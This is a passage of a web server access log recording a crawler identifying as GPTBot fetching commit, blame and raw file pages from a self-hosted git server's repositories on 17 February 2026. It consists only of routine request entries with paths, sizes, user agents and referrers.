74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore" -[17/Feb/2026:14:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py" -[17/Feb/2026:14:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md" -[17/Feb/2026:14:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:14:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 9903] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:14:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10282] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" -[17/Feb/2026:14:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10109] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" -[17/Feb/2026:14:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10079] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" -[17/Feb/2026:14:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache" [Client 74.7.227.38] [Length 9894] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache" -[17/Feb/2026:14:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10527] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm" -[17/Feb/2026:14:19:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/honeywell-logo.svg?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:14:19:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py" [Client 74.7.227.38] [Length 12921] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" -[17/Feb/2026:14:19:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/docker-compose.yml" [Client 74.7.227.38] [Length 12584] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1" -[17/Feb/2026:14:19:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py" [Client 74.7.227.38] [Length 15636] [Gzip 4.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f" -[17/Feb/2026:14:19:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py" [Client 74.7.227.38] [Length 12949] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f" -[17/Feb/2026:14:19:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml" [Client 74.7.227.38] [Length 12455] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f" -[17/Feb/2026:14:19:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71828] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:14:19:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py" [Client 74.7.227.38] [Length 16313] [Gzip 8.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" -[17/Feb/2026:14:19:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 12997] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" -[17/Feb/2026:14:19:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fproject.nuget.cache" [Client 74.7.227.38] [Length 22614] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache" -[17/Feb/2026:14:19:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json" [Client 74.7.227.38] [Length 11045] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup" -[17/Feb/2026:14:19:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11673] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject" -[17/Feb/2026:14:19:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py" [Client 74.7.227.38] [Length 9838] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py" -[17/Feb/2026:14:19:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/docker-compose.yml" [Client 74.7.227.38] [Length 10535] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/docker-compose.yml" -[17/Feb/2026:14:19:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py" [Client 74.7.227.38] [Length 9885] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py" -[17/Feb/2026:14:19:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py" -[17/Feb/2026:14:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml" [Client 74.7.227.38] [Length 10098] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml" -[17/Feb/2026:14:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml" [Client 74.7.227.38] [Length 12463] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml" -[17/Feb/2026:14:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/docker-compose.yml" [Client 74.7.227.38] [Length 13575] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/docker-compose.yml" -[17/Feb/2026:14:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 12776] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:14:19:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 153442] [Gzip 15.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:19:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10770] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:19:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/docker-compose.yml" [Client 74.7.227.38] [Length 1058] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/docker-compose.yml" -[17/Feb/2026:14:19:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py" -[17/Feb/2026:14:20:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py" [Client 74.7.227.38] [Length 12438] [Gzip 5.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py" -[17/Feb/2026:14:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py" [Client 74.7.227.38] [Length 3437] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py" -[17/Feb/2026:14:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py" [Client 74.7.227.38] [Length 12474] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py" -[17/Feb/2026:14:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py" -[17/Feb/2026:14:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml" [Client 74.7.227.38] [Length 1014] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml" -[17/Feb/2026:14:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 2086] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:14:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json" -[17/Feb/2026:14:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile" -[17/Feb/2026:14:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:14:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 9912] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:14:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:14:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:14:20:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:14:20:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 